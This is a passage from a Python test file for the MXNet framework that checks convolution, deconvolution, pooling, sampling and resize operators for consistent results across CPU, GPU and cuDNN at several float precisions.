{'ctx': mx.gpu(0), 'deconv_data': (1, 8, width), 'type_dict': {'deconv_data': np.float64}}]
sym = mx.sym.Deconvolution(layout='NCW', num_filter=problematic_c, kernel=(2,), name='deconv')
check_consistency([sym, sym], ctx_list, grad_req=grad_req, scale=scale)
def test_2D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (1, 8, 2, width), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (1, 8, 2, width), 'type_dict': {'deconv_data': np.float64}}]
sym = mx.sym.Deconvolution(layout='NCHW', num_filter=problematic_c, kernel=(2,2), name='deconv')
check_consistency([sym, sym], ctx_list, grad_req=grad_req, scale=scale)
# Run with different data tensor shapes to run cudnnFind() multiple times.
# First, populate algo and op caches with models that always use cudnnFind() (req == 'write').
# Then run models that must avoid cached cudnnFind() results in some cases (req == 'add').
widths = [4, 16, 64]
for req in ['write', 'add']:
for width in widths:
test_1D_with_width(width, req)
test_2D_with_width(width, req)
@with_seed()
@pytest.mark.serial
def test_convolution_versions():
# 2D convolution NCHW
ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}]
conv_v1_cpu = mx.sym.Convolution_v1(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_v1_gpu = mx.sym.Convolution_v1(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
conv_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_cpu = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_gpu = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
syms = [conv_v1_cpu, conv_v1_gpu, conv_cudnn, conv_cpu, conv_gpu]
check_consistency(syms, ctx_list)
# 3D convolution NCDHW
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
conv_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
conv_cpu = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
conv_gpu = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
syms = [conv_cudnn, conv_cpu, conv_gpu]
check_consistency(syms, ctx_list)
# More max-pooling strides and pads to test cudnn pooling implementation code paths
@with_seed()
@pytest.mark.serial
def test_pooling_nhwc_with_convention():
def make_pooling_syms(**kwargs):
# Conventional NCHW layout pooling
sym = mx.sym.Pooling(**kwargs)
# NHWC pooling
data = mx.sym.Variable('pool_data')
sym_nhwc = mx.sym.transpose(data, axes=(0,2,3,1))
sym_nhwc = mx.sym.Pooling(sym_nhwc, layout='NHWC', **kwargs)
sym_nhwc = mx.sym.transpose(sym_nhwc, axes=(0,3,1,2), name='pool')
return [sym, sym_nhwc]
# While the float32 and float64 output is reliably consistent, float16 departs occasionally.
# We compare nhwc and nchw results only within a given precision.
for in_shape in [(3, 4, 8, 8), (2, 2, 20, 20)]:
for kernel in [(2,2), (3,3), (4,4)]:
for stride in [(1,1), (1,2), (2,1), (2,2)]:
for data_type in [np.float64, np.float32, np.float16]:
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': in_shape,
'type_dict': {'pool_data': data_type}}]
symlist = make_pooling_syms(kernel=kernel, pool_type='max', stride=stride,
pooling_convention='valid', name='pool')
check_consistency_NxM(symlist, ctx_list)
symlist = make_pooling_syms(kernel=kernel, pool_type='max', stride=stride,
pooling_convention='full', name='pool')
check_consistency_NxM(symlist, ctx_list)
symlist = make_pooling_syms(kernel=(300,300), pool_type='max',
global_pool=True, name='pool')
check_consistency_NxM(symlist, ctx_list)
@pytest.mark.serial
def test_pooling_with_type():
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float32}},
{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float16}},
{'ctx': mx.cpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.cpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float32}}]
sym = mx.sym.Pooling(kernel=(3,3), pool_type='max', pooling_convention='valid', name='pool')
check_consistency(sym, ctx_list, rand_type=np.float16)
sym = mx.sym.Pooling(kernel=(3,3), pool_type='max', pooling_convention='full', name='pool')
check_consistency(sym, ctx_list, rand_type=np.float16)
sym = mx.sym.Pooling(kernel=(300,300), pool_type='max', global_pool=True, name='pool')
check_consistency(sym, ctx_list, rand_type=np.float16)
@with_seed()
@pytest.mark.serial
def test_deconvolution_with_type():
# Test basic deconvolution without exercising stride, pad or dilation.
# 1D deconvolution
sym = mx.sym.Deconvolution(num_filter=3, kernel=(3,), name='deconv')
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}]
# wider tolerance needed for true-fp16 test above
tol = {np.dtype(np.float16): 0.3,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, rtol=tol, atol=tol)
check_consistency(sym, ctx_list, rtol=tol, atol=tol, grad_req="add")
# 2D deconvolution
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), name='deconv')
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}}]
# wider tolerance needed for true-fp16 test above
tol = {np.dtype(np.float16): 0.3,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, rtol=tol, atol=tol)
check_consistency(sym, ctx_list, rtol=tol, atol=tol, grad_req="add")
@with_seed()
@pytest.mark.serial
def test_deconvolution_options():
# 1D deconvolution
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), pad=(1,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), pad=(1,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), stride=(2,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), stride=(2,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), dilate=(2,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), dilate=(2,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 2D deconvolution
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), pad=(1,1), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), pad=(1,1), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), stride=(2,2), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), stride=(2,2), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), dilate=(2,2), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), dilate=(2,2), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# # 3D deconvolution (not yet enabled)
# ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# # Pad > 0
# sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
# sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
# check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# # Stride > 1
# sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), name='conv')
# sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), cudnn_off=True, name='conv')
# check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
@with_seed(1234)
def test_bilinear_sampler_with_type():
data = mx.sym.Variable('data')
grid = mx.sym.Variable('grid')
sym = mx.sym.BilinearSampler(data=data, grid=grid)
ctx_list = [{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float64}},
{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float32}},
{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float16}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float64}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
@with_seed()
def test_grid_generator_with_type():
data = mx.sym.Variable('data')
sym = mx.sym.GridGenerator(data=data, transform_type='affine', target_shape=(20, 20))
scale = 1
ctx_list = [{'ctx': mx.gpu(0), 'data': (3, 6), 'type_dict': {'data': np.float32}},
{'ctx': mx.cpu(0), 'data': (3, 6), 'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list, scale=scale)
check_consistency(sym, ctx_list, scale=scale, grad_req="add")
sym = mx.sym.GridGenerator(data=data, transform_type='warp', target_shape=(20, 20))
ctx_list = [{'ctx': mx.gpu(0), 'data': (3, 2, 20, 20), 'type_dict': {'data': np.float32}},
{'ctx': mx.cpu(0), 'data': (3, 2, 20, 20), 'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
@with_seed()
def test_spatial_transformer_with_type():
data = mx.sym.Variable('data')
loc = mx.sym.Flatten(data)
loc = mx.sym.FullyConnected(data=loc, num_hidden=10)
loc = mx.sym.Activation(data=loc, act_type='relu')
loc = mx.sym.FullyConnected(data=loc, num_hidden=6)
sym = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=(10, 10),
transform_type="affine", sampler_type="bilinear", cudnn_off=True)
ctx_list = [{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'type_dict': {'data': np.float64}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'type_dict': {'data': np.float64}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
sym = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=(10, 10),
transform_type="affine", sampler_type="bilinear", cudnn_off=False)
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
@with_seed()
def test_pooling_with_type2():
# While the float32 and float64 output is reliably consistent, float16 departs occasionally.
# We compare cpu and gpu results only within a given precision.
for data_type in [np.float64, np.float32, np.float16]:
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': data_type}},
{'ctx': mx.cpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': data_type}}]
sym = mx.sym.Pooling(name='pool', kernel=(3,3), stride=(2,2), pool_type='max')
check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(name='pool', kernel=(3,3), pad=(1,1), pool_type='avg')
check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(name='pool', kernel=(5,5), pad=(2,2), pool_type='max')
check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(name='pool', kernel=(3,3), pad=(1,1), pool_type='sum')
check_consistency(sym, ctx_list)
@with_seed()
def test_pooling_nhwc_with_type():
def make_pooling_syms(**kwargs):
# Conventional NCHW layout pooling
sym = mx.sym.Pooling(**kwargs)
# NHWC pooling
data = mx.sym.Variable('pool_data')
sym_nhwc = mx.sym.transpose(data, axes=(0,2,3,1))
sym_nhwc = mx.sym.Pooling(sym_nhwc, layout='NHWC', **kwargs)
sym_nhwc = mx.sym.transpose(sym_nhwc, axes=(0,3,1,2), name='pool')
return [sym, sym_nhwc]
# While the float32 and float64 output is reliably consistent, float16 departs occasionally.
# We compare nhwc and nchw results only within a given precision.
for data_type in [np.float64, np.float32, np.float16]:
# NHWC pooling only enabled on GPU with CUDNN
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': data_type}}]
symlist = make_pooling_syms(name='pool', kernel=(3,3), stride=(2,2), pool_type='max')
check_consistency_NxM(symlist, ctx_list)
symlist = make_pooling_syms(name='pool', kernel=(3,3), pad=(1,1), pool_type='avg')
check_consistency_NxM(symlist, ctx_list)
symlist = make_pooling_syms(name='pool', kernel=(5,5), pad=(2,2), pool_type='max')
check_consistency_NxM(symlist, ctx_list)
@with_seed()
@pytest.mark.serial
def test_pooling_versions():
# Produce the name of the 'transposed' layout, given the dimension
def transposed_layout(ndim):
if ndim < 3 or ndim > 5:
raise RuntimeError("Invalid data dim, expecting 3, 4 or 5")
return ('NWC', 'NHWC', 'NDHWC')[ndim-3]
# default padding is all zeros
def is_default_pad(pad):
return pad == (0,) * len(pad)
# default stride is all ones
def is_default_stride(stride):
return stride == (1,) * len(stride)
# returns True/False randomly with equal probability
def random_choice():
return np.random.random(1)[0] < 0.5
def test_pooling_versions_helper(pool_op_list, data, kernel, pool_type, pad, stride,
pooling_convention='valid', global_pool=False, p_value=2,
count_include_pad=True, tol=None, dtype=np.float32):
ctx_list = []
sym_list = []
for pool_ctx in pool_op_list:
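            # Entries are named '<op>_<ctx>', e.g. 'pool_transposed_cudnn'.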
(pool_op, ctx_type) = pool_ctx.rsplit('_', 1)
expected_ctxs = ['cpu', 'gpu', 'cudnn']
if ctx_type not in expected_ctxs:
raise RuntimeError('Expected one of {}, saw {}.'.format(expected_ctxs, ctx_type))
ctx = mx.cpu(0) if ctx_type == 'cpu' else mx.gpu(0)
ctx_list.append({'ctx': ctx, 'pool_data': data, 'type_dict': {'pool_data': dtype}})
# start with pool args present in all cases
pool_op_args = {'kernel': kernel, 'pool_type': pool_type,
'pooling_convention' : pooling_convention, 'name' : 'pool'}
# add other args as needed
if global_pool:
pool_op_args['global_pool'] = True
else:
                # Add the pad and stride params when they are non-default, and also randomly when they match the default
if not is_default_pad(pad) or random_choice():
pool_op_args.update({'pad' : pad})
if not is_default_stride(stride) or random_choice():
pool_op_args.update({'stride' : stride})
expected_pool_ops = ['pool', 'pool_transposed', 'pool_v1']
if pool_op == 'pool_v1':
sym = mx.sym.Pooling_v1(**pool_op_args)
else:
pool_op_args.update({'p_value' : p_value, 'count_include_pad' : count_include_pad})
if ctx_type != 'cpu':
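                        # cudnn_off=True selects the plain GPU kernel; the 'cudnn' variant leaves cuDNN enabled.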
pool_op_args['cudnn_off'] = ctx_type == 'gpu'
if pool_op == 'pool':
# isolate pooling input from symbol input to test shared tensor optimizations
buffered_input = mx.sym.identity(name='pool')
sym = mx.sym.Pooling(buffered_input, **pool_op_args)
elif pool_op == 'pool_transposed':
ndim = len(data)
# NCW->NWC axes=(0,2,1) NCHW->NHWC axes=(0,2,3,1) NCDHW->NDHWC axes=(0,2,3,4,1);
axes = (0,) + tuple(range(2,ndim)) + (1,)
transposed = mx.sym.transpose(axes=axes, name='pool')
pooled = mx.sym.Pooling(data=transposed, layout=transposed_layout(ndim),
**pool_op_args)
# NWC->NCW axes=(0,2,1) NHWC->NCHW axes=(0,3,1,2) NDHWC->NCDHW axes=(0,4,1,2,3);
axes = (0, ndim-1) + tuple(range(1,ndim-1))
sym = mx.sym.transpose(data=pooled, axes=axes, name='pool')
else:
raise RuntimeError('Expected one of {}, saw {}.'.format(expected_pool_ops,
pool_op))
sym_list.append(sym)
check_consistency(sym_list, ctx_list, equal_nan=(not count_include_pad), rtol=tol, atol=tol)
def test_pooling_dim(dim, pool_type, dtype, pool_op_list, p_value=2, count_include_pad=True,
tol=None):
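        # Each dim class fixes a data shape plus several (kernel, pad, stride) combinations; run them under both pooling conventions, then a global-pool case.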
if dim == '1D':
data = (3, 3, 10)
kernels = [(4,), (4,), (5,)]
pads = [(0,), (2,), (2,)]
strides = [(1,), (2,), (1,)]
elif dim == '2D_no_padding':
data = (3, 2, 20, 20)
kernels = [(3, 3), (4, 5)]
pads = [(0, 0), (0, 0)]
strides = [(1, 1), (2, 1)]
elif dim == '2D':
data = (2, 2, 20, 20)
kernels = [(3, 3), (3, 5), (4, 5), (4, 5)]
pads = [(0, 0), (1, 2), (0, 0), (2, 3)]
strides = [(1, 1), (1, 1), (2, 1), (1, 1)]
elif dim == '3D':
data = (2, 3, 20, 20, 20)
kernels = [(4, 5, 3), (4, 5, 3), (3, 5, 7)]
pads = [(0, 0, 0), (2, 3, 2), (1, 2, 3)]
strides = [(1, 1, 1), (2, 3, 1), (1, 1, 1)]
else:
raise RuntimeError('Unexpected pooling test class: {}.'.format(dim))
for kernel, pad, stride in zip(kernels, pads, strides):
for pooling_convention in ['valid', 'full']:
try:
test_pooling_versions_helper(pool_op_list=pool_op_list,
data=data, kernel=kernel, pad=pad, stride=stride,
pool_type=pool_type, pooling_convention=pooling_convention,
global_pool=False, p_value=p_value,
count_include_pad=count_include_pad, tol=tol, dtype=dtype)
except:
print('pool_op_list = {}'.format(pool_op_list))
print('kernel={}, pad={}, stride={}'.format(kernel, pad, stride))
print('pool_type={}, pooling_convention={}, global_pool=False'.format(pool_type,
pooling_convention))
print('p_value={}, count_include_pad={}, dtype={}'.format(p_value,
count_include_pad, dtype))
print('environ = \n{}'.format(os.environ))
raise
# Make sure kernel is ignored during global_pool by sometimes setting it to a crazy value
kernel = kernels[0]
if random_choice():
kernel = (300,) * len(kernel)
test_pooling_versions_helper(pool_op_list=pool_op_list,
data=data, kernel=kernel, pad=None, stride=None,
pool_type=pool_type, global_pool=True, p_value=p_value,
count_include_pad=count_include_pad, tol=tol, dtype=dtype)
# The various implementations of the standard pooling operator
std_pool_op_list = ['pool_cpu', 'pool_transposed_cpu',
'pool_gpu', 'pool_transposed_gpu',
'pool_cudnn', 'pool_transposed_cudnn']
# The implementations of the 'v1' pooling operator
v1_pool_op_list = ['pool_v1_cpu', 'pool_v1_gpu']
    # For cases where all implementations should match, use the combined implementation list.
combo_pool_op_list = std_pool_op_list + v1_pool_op_list
for dtype in [np.float32, np.float64, np.float16]:
# Testing of the standard (not 'v1') pooling operator is universal across all
# data dimensions, implementations and layouts.
for dim in ['1D', '2D', '3D']:
test_pooling_dim(dim, 'max', dtype, std_pool_op_list)
test_pooling_dim(dim, 'avg', dtype, std_pool_op_list, count_include_pad=True)
test_pooling_dim(dim, 'avg', dtype, std_pool_op_list, count_include_pad=False)
test_pooling_dim(dim, 'sum', dtype, std_pool_op_list)
test_pooling_dim(dim, 'lp', dtype, std_pool_op_list, p_value=1)
test_pooling_dim(dim, 'lp', dtype, std_pool_op_list, p_value=2)
test_pooling_dim(dim, 'lp', dtype, std_pool_op_list, p_value=3)
# Testing of the 'v1' pooling operator is over its restricted support domain of
# 2D data only and not with the 'lp' pooling type. The 'v1' cpu and gpu versions are
# always tested against each other, and sometimes against the standard operator versions.
# The slightly different 'v1' definition prevents this in the following cases:
#
# 1. In max pooling, when multiple input values are the maximum in the input window,
# the 'v1' implementation backprops the gradient to all maxima, whereas the standard
# pooling operator backprops the gradient to the lowest-indexed maximum only.
# 2. In max pooling, the 'v1' operator pads with 0's and this value can become the
# maximum output value in the case of an all-negative input. The standard pooling
# operator effectively considers the padding to be the largest negative value, so
# only input values should appear in the output.
# 3. In avg pooling, the 'v1' operator divides the sum by the same window size factor,
# even at the edges, and so does not support count_include_pad = False.
# 4. The float16 'v1' pooling operator performs forward sums and averages in
# float16, whereas the std operators perform those calculations in float32, so
# greater float16 tolerances are needed when comparing across implementations.
        # Double the float16 tol when comparing v1 and non-v1 implementations, per note 4 above.
relaxed_tol = {np.dtype(np.float16): 2e-1,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0,
np.dtype(np.int64): 0}
# Exclude std implementations due to points 1 and 2 above.
test_pooling_dim('2D', 'max', dtype, v1_pool_op_list)
# The standard and 'v1' implementations match for this case.
test_pooling_dim('2D', 'avg', dtype, combo_pool_op_list, count_include_pad=True,
tol=relaxed_tol)
# Exclude std implementations due to point 3 above.
test_pooling_dim('2D', 'avg', dtype, v1_pool_op_list, count_include_pad=False)
# The standard and 'v1' implementations match for this case.
test_pooling_dim('2D', 'sum', dtype, combo_pool_op_list, tol=relaxed_tol)
# We can compare the standard and 'v1' max pooling implementations if we eliminate padding
# (see point 2 above) and use np.float64 data so that no two random input window values are
# likely to be the same (see point 1 above).
test_pooling_dim('2D_no_padding', 'max', np.float64, combo_pool_op_list)
@with_seed()
def test_pooling_full_2d():
def test_pooling_full_2d_type(pool_type):
data = (2, 2, 10, 10)
kernel = (4, 5)
pad = (1, 2)
stride = (3, 4)
convention = 'full'
ctx_list = []
sym_list = []
# o_h = ceil((10 + 1 + 1 - 4) / 3) + 1 = 4
# o_w = ceil((10 + 2 + 2 - 5) / 4) + 1 = 4
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=convention, global_pool=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=convention, global_pool=False, name='pool'))
check_consistency(sym_list, ctx_list)
test_pooling_full_2d_type('max')
test_pooling_full_2d_type('avg')
test_pooling_full_2d_type('sum')
@with_seed()
@pytest.mark.serial
def test_flatten_slice_after_conv():
ctx_list = []
data = mx.sym.Variable('conv_data')
conv = mx.symbol.Convolution(data=data, name='conv', num_filter=16, kernel=(3,3), stride=(1,1))
flatten = mx.symbol.flatten(data=conv)
slice_sym = mx.symbol.slice(data=flatten, begin=0, end=1)
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 16, 16, 16), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.cpu(0), 'conv_data': (2, 16, 16, 16), 'type_dict': {'conv_data': np.float32}}]
check_consistency(slice_sym, ctx_list, scale=0.5)
@with_seed()
def test_bilinear_resize_op():
ctx_list = [{'ctx': mx.cpu(0), 'data': (2, 2, 20, 20), 'type_dict': {'data': np.float32}},
{'ctx': mx.gpu(0), 'data': (2, 2, 20, 20), 'type_dict': {'data': np.float32}}]
data = mx.sym.Variable('data')
sym = mx.sym.contrib.BilinearResize2D(data, height=10, width=5, align_corners=True)
check_consistency(sym, ctx_list)
sym = mx.sym.contrib.BilinearResize2D(data, height=10, width=5, align_corners=False)
check_consistency(sym, ctx_list)
sym = mx.sym.contrib.BilinearResize2D(data, None, scale_height=2, scale_width=0.5, mode='odd_scale', align_corners=True)
check_consistency(sym, ctx_list)
sym = mx.sym.contrib.BilinearResize2D(data, None, scale_height=2, scale_width=0.5, mode='odd_scale', align_corners=False)
check_consistency(sym, ctx_list)
sym = mx.sym.contrib.BilinearResize2D(data, None, scale_height=0.5, scale_width=2, mode='to_even_up', align_corners=True)
check_consistency(sym, ctx_list)
sym = mx.sym.contrib.BilinearResize2D(data, None, scale_height=0.5, scale_width=2, mode='to_even_up', align_corners=False)
check_consistency(sym, ctx_list)
@with_seed()
@pytest.mark.serial
def test_global_pooling():
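    # With global_pool=True, kernel/pad/stride should be ignored, so symbols built with and without them must produce identical results.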
def test_1d_pooling(pool_type, p_value=2):
data = (2, 3, 20)
kernel = (4,)
pad = (2,)
stride = (2,)
ctx_list = []
sym_list = []
pooling_convention = 'valid'
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
